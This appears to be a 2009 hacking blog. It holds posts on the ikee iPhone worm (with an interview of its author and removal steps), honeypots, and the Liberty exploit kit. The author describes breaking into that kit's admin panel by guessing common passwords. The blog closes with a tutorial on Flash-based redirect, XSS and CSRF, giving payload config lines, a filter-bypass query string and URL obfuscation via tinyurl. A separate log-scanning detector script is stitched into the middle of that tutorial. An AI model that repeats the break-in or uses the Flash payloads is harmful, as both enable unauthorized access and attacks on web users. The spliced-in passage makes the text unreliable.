Thursday 31 December 2009

Happy New Year :D

I have been a bit absent lately because I am busy with projects that take a lot of my time and that I find fantastic...

Lately I read Stieg Larsson's Millennium trilogy; the story is very gripping and the characters adorable.
A pity that many questions remain unanswered because of the author's death :( ;
for example, what Lisbeth's sister is up to...

I am also starting another book, La matematica del novecento by Odifreddi.

I wish everyone a Happy New Year and leave you with an image made by Achamo

Penguin Company by achamo

Friday 13 November 2009

exploitbin project open

exploitbin code project

exploitbin is a pastebin with exploit functionality and an open source collaboration platform for finding exploits on the internet.

It is pretty new and needs a lot of help!!!

ikee virus for iphone

Have you jailbroken your iPhone to make it more configurable, do you use SSH to upload stuff, and have you not changed your password???

Most internet sites publish the default password of the jailbroken iPhone's SSH (alpine); this information can be used by malware or a bad user to take information and put your iPhone at risk.

These days there is also an iPhone virus:

http://is.gd/4Unwx

The virus is really simple: it checks IPs and if it finds an iPhone on the network it tries to use the default SSH password.

Securing your iPhone is pretty simple.

For this guide, you are going to need MobileTerminal (download it from Cydia):
  1. Open the MobileTerminal application on your device.
  2. Type in 'su root' and press enter.
  3. It will ask for the password, so type in 'alpine', which is the default password.
  4. Type in 'passwd' and press enter.
  5. It will ask for a new password (more than 5 characters), so type it in.
  6. It will ask you to retype the password.

This is the interview with the creator:

[09:02] Hi ikee :-) Thanks for joining me
[09:02] nps
[09:03] Now, as you're well aware, you wrote a virus that is infecting many iPhones in Australia. I guess the real question to start with is why?
[09:04] First i was curious to how far something like this would actually spread, i think what most people were unaware of is the fact it IS a worm and every phone that got infected with it was spreading it (I initially only infected 3 phones when I woke up i checked google and found out a fair few people were hit with it)
[09:05] Secondly i was quite amazed by the number of people who didn't RTFM and change their default passwords.
[09:07] How far did you expect it to spread, exactly?
[09:08] Well i didn't think that many people would have not changed their passwords I was expecting to see maybe 10~ or so people, at first I was not even going to add the replicate/worm code but it was a learning experience and i got a tad carried away :)
[09:11] Are you aware that it has even started to replicate itself overseas?
[09:13] I heard a few stories about it, that would have been sheer luck, the code itself is set to firstly scan the 3G IP range the phone is on, then Optus/Vodafone/Telstra's IP Ranges (I think the reason Optus got hit so hard is because the other 2 are NAT'd) then a random 20 IP ranges. I'm guessing a few phones hit a range that another vulnerable phone was on.
[09:14] (From another country)
[09:15] Well that was my next question: Why does it only seem to be hitting Optus here and Overseas (I was presuming from screenshots I've seen)... So you're saying the Optus network is more vulnerable due to it not using NAT?
[09:17] I don't think it was an Optus fault (Being an Optus user I quite like the fact i can access my iPhone services from the outside world), I think it was mainly the fault of people being too lazy to change their passwords (It only takes a couple of seconds guys) and I hope this taught a few people that.
[09:18] So do you know exactly how many people are currently infected with the "ikee virus"?
[09:20] I can only confirm how many my phone infected alone, which was 100+ phones. I think most of them fixed it (AND I'M HOPING THEY CHANGED THEIR PASSWORDS.)
[09:21] So your major defense seems to be that people left themselves vulnerable, Do you steal stuff from people's houses if they leave the backdoor open?
[09:24] I'll answer your question with two questions, Have you ever used unprotected Wifi? and Technically I did not steal anything, have you ever littered on someone else's property? (Smokers will definitely associate ;))
[09:25] Ok, I suppose I can personally admit to both of them, but it seems alot more to me like vandalism than littering, which isn't something I would do
[09:27] Personally I would class littering as vandalism (They definitely don't want your rubbish there). I admit I probably pissed off a few people, but it was all in good fun (well ok for me anyway)
[09:30] So that explains why you decided to use Rick Astley. In my research, I've been reading about a similar virus (it seems) that contains a picture of an 'asian child' - I haven't seen screenshots of this, but that's how it is described. Are you also responsible for the "Asian Child virus"?
[09:32] Ahh that was a quirk of my bad coding, the 'virus' itself has 4 variations and the first variation would resend its LockBackground.jpg to the victim. I did not comprehend that the infector might have not rebooted their phone after changing the LockBackground to something else (Causing them to send their changed lockbackground instead of Mr Astley)
[09:36] So it's the same virus, but now containing a picture of someone's loved one?
[09:37] Yeah, that was definitely not the intended effect.
[09:39] Are you aware of the possible legal consequences of this (the ikee virus)? Are you concerned?
[09:40] I'd like to think I'm aware, and also I highly doubt I'm in any real trouble (So no not concerned)
[09:43] James01 on Whirlpool asks: at least one person has reported being affected without a jailbreak – seems unlikely given the nature of the phone and what I have garnered about the "virus" - is this possible, or are the reports unreliable/mistaken?
[09:44] It only affects jailbroken phones, so people probably just got a little confused
[09:45] vanquish777 on Whirlpool says: What I want to know is, how did I get infected when I had SSH toggled off
[09:46] You didn't :), My guess is you had it on and when the 'virus' hit, it disabled sshd so when you checked it afterwards it appeared to be off
[09:47] Which reminds me, many people have said they are no longer able to disable SSH, is this intended to make sure you can do more damage to users?
[09:50] This was a hard bit for me to do, until i hit this the virus was not destructive at all. My first intention was to change the root/mobile password to random strings, then embed the strings into the LockBackground. Unfortunately passwd uses a tty (and not stdin) for its new password:request (similar to ssh logins, which is why you might find sshpass in /bin/, i had to port it) so to stop the phone getting infected over and over again (and
[09:50] someone else catching on and having mischief with peoples phones) I removed SSHD (cydia reinstall will remedy the problem)
[09:51] (Cydia reinstall of SSH not reinstall Cydia itself)
[09:53] So you're saying that the only harm this virus causes is the removal of the SSH Daemon, which effectively, disables the initial problem?
[09:53] Well that and the pretty background yes :)
[09:54] You mentioned that there are four versions/variants, what are the differences between them?
[09:55] Variants A-C were quite similar and the ones most people have brought up. Variant D is a fair bit different, it stores its files in a completely different place and hides itself a lot more (No random plists in LaunchDaemons)
[09:56] So you're saying that the newest variant is more hidden, is it more malicious?
[09:57] It is a lot more hidden, I think most phones tend to be more secured now so it should die pretty fast. It is a little more malicious, it tampers with some Cydia files.
[10:01] Do Android users risk being infected? I'm guessing that the virus would only log in as root:alpine (the default root username and password for the iPhone OS IIRC)
[10:02] AFAIK no unless a user decided to use the same passwords, Although there is a weird quirk I read about dropbear in Android allowing any password (A bug with libcrypt I believe) but I could be very wrong.
[10:03] But even if an android phone was attacked the platform differences would not allow the code to be run :)
[10:04] Just out of curiosity, what do you call what I've named the "ikee virus"?
[10:05] Its in a folder called POC-iWorm (Proof Of Concept) but I never named it (ikee virus works!)
[10:09] You yesterday agreed to send me the source code (and removal instructions), what variant will it contain?
[10:10] C/D whatever version you want :)
[10:11] How about all four? I'll obviously be placing them online - probably Google Code or similar
[10:13] A-C was updated so I don't have the first 2, I forked D from C. (I don't know if its so wise posting the code online, nefarious people that otherwise would not have had the chance could modify it to be quite destructive)
[10:14] Perhaps, But it has become quite clear that there's a load of people that are unsecure, and if anyone wants to do anything bad enough, they are already going to know how.
[10:15] I guess i'm hoping that the jailbreak software will soon have a "enter new root password" prompt for those users that are un-aware.
[10:15] I'll leave the choice up to you :)
[10:15] I'd love to see that
[10:16] or even a random password generated and displayed for the user to write down
[10:17] Yes, it would be very good. I had an iPod Touch a while ago, which I "jailbroke" - admittedly I didn't change the default password. I guess i'm just glad it's not me.
[10:17] Do you plan on making any further variants? If so, why?
[10:18] No, I think the point has been made
[10:18] Have you developed anything PRODUCTIVE in the iPhone world?
[10:21] I'm not too sure what others would class productive. I do not own a MAC or run OSX (Using a linux cross compile toolchain) so it makes it a bit of a challenge to develop any applications utilising the UI (I have tho -.-). I think the best program I've developed for it for me was a remote debugging library that sends debug information over the network (Using MCAST)
[10:23] Do you have anything further to add (I'm having a mental blank on questions to ask right now)
[10:26] I hope I did not piss off many people, this was a very simple problem and has an even simpler solution. I thought it was quite funny and I hope others did too :)
[10:27] You mentioned infecting only three iPhones to being with, when did that happen?
[10:28] Around 4am November 6th (Yeah I have no life)
[10:31] To confirm, other than replicating itself, adding the picture of Rick Astley, and removing the SSH Daemon, are we likely to find anything else it does?
[10:32] Nothing, and if you're releasing the source code people will be able to see that :)
[10:33] Can you please explain to me, how an infected user would remove the different versions correctly?
[10:33] by correctly, I mean completely.
[10:33] Sure, variants A-C store files in these directories
[10:34] /bin/poc-bbot
[10:34] /bin/sshpass
[10:34] /var/log/youcanbeclosertogod.jpg
[10:34] /var/mobile/LockBackground.jpg
[10:35] /System/Library/LaunchDaemons/com.ikey.bbot.plist
[10:35] /var/lock/bbot.lock
[10:35] using an rm (in SSH or mobile-terminal on those files will remove it)
[10:36] then reboot the phone, change your password and reinstall SSH
[10:36] For variant D it's a bit different
[10:36] The locations are
[10:37] /usr/libexec/cydia/startup
[10:37] /usr/libexec/cydia/startup.so
[10:37] /usr/libexec/cydia/startup-helper
[10:37] /System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist
[10:38] Of course cydia used these files previously so you may need to reinstall it after deleting this files
[10:38] *these
[10:38] So the D variant overwrites system files?
[10:39] Overwrits cydia's files
[10:39] *Overwrites
[10:39] Sorry, I'm not an expert at the iPhone OS :P
[10:39] Neither :P
[10:40] So none of your versions do contain any password changing commands?
[10:40] I mean, so when I provide uninstall instructions, I can tell them to use alpine as the password ?
[10:41] None of the code changes passwords
[10:42] Thanks for your time ikee, and I really hope you do get into developing things that are productive sometime soon.
[10:42] me too :) and no problems
[10:42] Perhaps on the Android platform (Yes, I know, I'm a fanboy)
[10:42] I just downloaded the x86 iso, so maybe :P
[10:43] I'll ask you more about that after I end this logging session, Cheers :)
[10:43] Ciaoo
End of #Interview_Room buffer Sun Nov 08 10:43:58 2009

Dropbox open source !!!

Votebox is open, an application to choose which new feature has priority over the others in the Dropbox application!

I'm a Debian user and I'm really sad that Dropbox is not in the Debian repository because the Dropbox images are copyrighted...
so I have opened a group to make Dropbox completely open source and GPL so it can be added to the Debian repository.

Please vote here:

https://www.dropbox.com/static/1258095601/images/votebox.png

*you have to log in to vote!

Honeypot and Honeynet

These days I have tried some new cool technology that I love...

Honeypot

What are they? A honeypot is a decoy vulnerable system used to attract malicious software, with the intent of letting it use the fake bugs on the server while at the same time gathering information about the attacker and the techniques used for the attacks. A honeynet is a network of two or more honeypots.

All the data retrieved by a honeypot can be used for many reasons: to try to build a profile of the attacker; for research, trying to capture the exploits and 0day stuff used by the attacker and learn about new vulnerabilities; and it can also be used in legal proceedings.


Honeypots are divided into three levels depending on how deeply an attacker can interact with them:

Low interaction: emulated by software; the interaction is very limited.

Medium interaction: chrooted or jailed, providing limited system access.

High interaction: the attacker can have full access to the server.

They are also classified by the data they can collect:

Production: can collect only limited information.

Research: can collect more information about the attacker and the tools used for the attack; they are used for research by governments and the military.

Another kind of honeypot is used to capture spammers, offering a fake SMTP server that convinces the abuser it is a usable SMTP relay for sending all sorts of email when in fact it is not; it can also try to capture the IP of the illegitimate user.

Some honeypots can also try to absorb and reverse the malware when it tries to attack the fake server, analysing the binary file for research.


Some honeypot software:

LaBrea is a tarpitting honeypot used to deceive the attacker's scanner by showing fake servers with all ports open on the unused IP addresses of the network, in order to tarpit it, but this can be useless against multithreaded scanners.

Nepenthes is a good botnet detector and tracker and can also try to reverse the binary file and shellcode.


Dionaea is the successor of Nepenthes, developed by the same team (http://dionaea.carnivore.it/), and is part of Google Summer of Code.

Honeyd is a small daemon needed to create virtual hosts on a network; these virtual hosts can be configured to attract intruders looking for specific vulnerabilities.

To make a honeypot work you have to be really patient!!! and wait...

An intruder can take a lot of time before trying to compromise it.

The best thing is to have a firewall and other security tools as well, to get the most possible data and information about the intrusion.

Liberty Exploit pack... exploited!

Liberty Exploit System
latest: 1.0.5

exploits:
MS06-014 Internet Explorer (MDAC) Remote Code Execution Exploit
PDF util.printf(), PDF collab.collectEmailInfo(), PDF collab.getIcon()
Flash 9
MS DirectShow
Snapshot
Java 0day

price: 500$

Yesterday I was looking at this pack of exploits called Liberty pack.

It was really interesting, and more interesting when I found that the default username and password are user and pass...

so I searched in malwareurl for a cpanel admin.php of Liberty pack...

On the first panel I found I tried user and pass to log in, but it didn't work, so I think the users of Liberty pack now also know that leaving the default password is insecure.

So I tried the most common passwords = 1234, god, password and... it worked!!!

Now I have access to the Liberty pack cpanel.

It looks nice, but not so nice for a 500$ exploit pack; it is the essentials to make it work...



Ok, it is not really big, I have seen some others with 15k unique visits, but it is not bad.

It injects mostly into IE7 and old IE versions.

The principal infected country is Turkey.


The most infected OS is Windows XP, but there is also a strange Unknown system that I suspect to be some "crew" Windows version like tinyxp or blackxp.

This is one of the most interesting parts: the referrals.

It looks like a Turkish forum is infected, http://www.msxlabs.org/

naturally about Windows stuff :D

and also the other referrals are all forums.

(I suppose that the attacker injects into the posts an invisible frame of the exploited page to infect other users of the forum)


Ok, this is the exploit used to infect the users.

How I found it... simply by looking in the page source I saw an id=6 about exploits, commented out.

I tried to insert it in the admin page and I saw the redirection to the exploit page :D

What does that exploit number mean? ms06-014 is a vulnerability in the Microsoft Data Access Components!!!

id=4 resets the counter.

I tried to inject some code in the upload form but it doesn't work for now...

These are the files used by Liberty pack:

site.com/index.php
site.com/download.pdf
site.com/Hidden.swf
site.com/update.php
site.com/update.exe
site.com/admin.php

thanks everyone for listening

Jump/XSS/CSRF in Flash

Hello everyone, sorry for my absence but I had a lot of stuff to do.

Today I talk about Jump/XSS/CSRF in Flash.

The point of this tutorial is to build a redirect with a Flash jump.

To start we need to use a precompiled swf:

fly.tar.gz

We have to upload the swf file to a webserver; I used altervista.org for it.

fly image screen shot

Then we have to make a txt file with the same name as the swf, like test.swf and test.txt.

fly image screen shot

Now we have to edit the txt file.

fly image screen shot

These are examples of the edits to the .txt file:

jump to http://drunkgeisha.noblogs.org
0,http://drunkgeisha.noblogs.org

open window to http://drunkgeisha.noblogs.org
1,http://drunkgeisha.noblogs.org

send GET Request to drunkgeisha.altervista.org
2,http://drunkgeisha.altervista.org/?hello

send POST Request to drunkgeisha.altervista.org
3,http://drunkgeisha.altervista.org/?hello,,,str=string

Call JavaScript
4,alert(/xss/)

fly image screen shot

Now you have to try it.

To do it you only need to write in the browser:

test.swf?sec80=http://yoursite/test.txt

This string may be better to bypass some filters:

test.swf?sec80=http://yoursite/test.txt&80sec.swf

If everything is correct you can see this:


fly image screen shot
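From the defender's side, the thing to look for is exactly the request shape shown above: a .swf on your own server being handed an absolute URL in its query string, which is where the jump/XSS/CSRF behaviour is loaded from. As an added example (not from the original post and not part of the fly swf), this Python snippet scans constructed web-server access-log lines for that pattern and also keeps the referer, which is what tells you which forum or page the swf was embedded in; the hosts, addresses and log lines are constructed, not real sites.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" access log format; referer and user agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample log lines (documentation addresses, not real sites):
# two requests hand a .swf a URL to fetch its behaviour from, one is a
# harmless Flash video player, one is plain HTML.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Nov/2009:10:22:01 +0100] "GET /prova.swf?sec80=http://203.0.113.9/prova.txt&80sec.swf HTTP/1.1" 200 1234 "http://forum.example/thread" "Mozilla/5.0"',
    '203.0.113.6 - - [13/Nov/2009:10:22:05 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Nov/2009:10:23:11 +0100] "GET /player.swf?file=video1.flv HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [13/Nov/2009:10:24:00 +0100] "GET /test.swf?sec80=http://uploads.example.org/test.txt HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]


def find_swf_url_params(log_lines, own_host):
    """Return one finding per .swf request whose query string carries an
    absolute http(s) URL; 'external' marks targets outside own_host."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # not a combined-format line
        req = urlsplit(m.group("path"))     # split path from query string
        if not req.path.lower().endswith(".swf"):
            continue
        # keep_blank_values so a bare "&80sec.swf" suffix still parses
        for key, value in parse_qsl(req.query, keep_blank_values=True):
            target = urlsplit(value)
            if target.scheme not in ("http", "https") or not target.netloc:
                continue                    # plain values such as file=video1.flv
            findings.append({
                "src_ip": m.group("ip"),
                "swf": req.path,
                "param": key,
                "target": value,
                "external": target.netloc.lower() != own_host.lower(),
                "referer": m.group("referer") or "-",
            })
    return findings


if __name__ == "__main__":
    for f in find_swf_url_params(SAMPLE_LOG, "uploads.example.org"):
        print(f)
```

Run against real logs, a finding with external set is the strongest signal (the swf is fetching instructions from somewhere you do not control); a same-host target still deserves a look, because in the tinyurl case shown in this post both the swf and its .txt live on the same free host.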

Now you have to embed it on some page.

I used tinyurl to obscure the url better: http://tinyurl.com/yhh5x7l = http://drunkgeisha.altervista.org/prova.swf?sec80=http://drunkgeisha.altervista.org/prova.txt

The result is this:

http://drunkgeisha.altervista.org/index.html

and this on blogspot.

Sorry for the bad quality, but it is my first tutorial video:

http://www.youtube.com/v/ZE8gUY3uIIk